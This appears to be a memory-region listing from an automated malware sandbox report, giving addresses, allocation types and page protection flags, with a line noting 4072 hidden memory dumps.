trusted library allocation
page read and write
6C61000
heap
page read and write
8944000
trusted library allocation
page read and write
8A80000
unkown
page read and write
5560000
trusted library allocation
page read and write
8960000
trusted library allocation
page read and write
9910000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
5C43000
trusted library allocation
page read and write
7690000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
8D70000
trusted library allocation
page read and write
7920000
trusted library allocation
page read and write
8870000
trusted library allocation
page read and write
59F0000
unkown
page read and write
8910000
trusted library allocation
page read and write
6D45000
trusted library allocation
page read and write
4BA0000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
130A000
trusted library allocation
page execute and read and write
104A000
heap
page read and write
68C0000
trusted library allocation
page read and write
8D50000
trusted library allocation
page read and write
6C00000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
4EA1000
heap
page read and write
6D40000
trusted library allocation
page read and write
79F0000
trusted library allocation
page read and write
5B51000
trusted library allocation
page read and write
6D80000
trusted library allocation
page read and write
8910000
trusted library allocation
page read and write
47BA000
trusted library allocation
page read and write
6C00000
trusted library allocation
page read and write
8930000
trusted library allocation
page read and write
5C5E000
trusted library allocation
page read and write
2E9E000
stack
page read and write
8910000
trusted library allocation
page read and write
6D30000
trusted library allocation
page read and write
8EB0000
trusted library allocation
page read and write
8D10000
trusted library allocation
page read and write
5C41000
trusted library allocation
page read and write
5700000
trusted library allocation
page read and write
8D30000
trusted library allocation
page read and write
5C24000
trusted library allocation
page read and write
5C43000
trusted library allocation
page read and write
5C39000
trusted library allocation
page read and write
98F0000
trusted library allocation
page read and write
8A00000
trusted library allocation
page read and write
8930000
trusted library allocation
page read and write
57D0000
trusted library allocation
page execute and read and write
6D70000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
6C61000
heap
page read and write
8CBE000
stack
page read and write
8D70000
trusted library allocation
page read and write
536E000
stack
page read and write
7674000
trusted library allocation
page read and write
4466000
trusted library allocation
page execute and read and write
6C61000
heap
page read and write
8990000
unkown
page read and write
537A000
heap
page read and write
6D50000
trusted library allocation
page read and write
5C43000
trusted library allocation
page read and write
C9D000
stack
page read and write
69B0000
trusted library allocation
page read and write
8D30000
trusted library allocation
page read and write
There are 4072 hidden memdumps, click here to show them.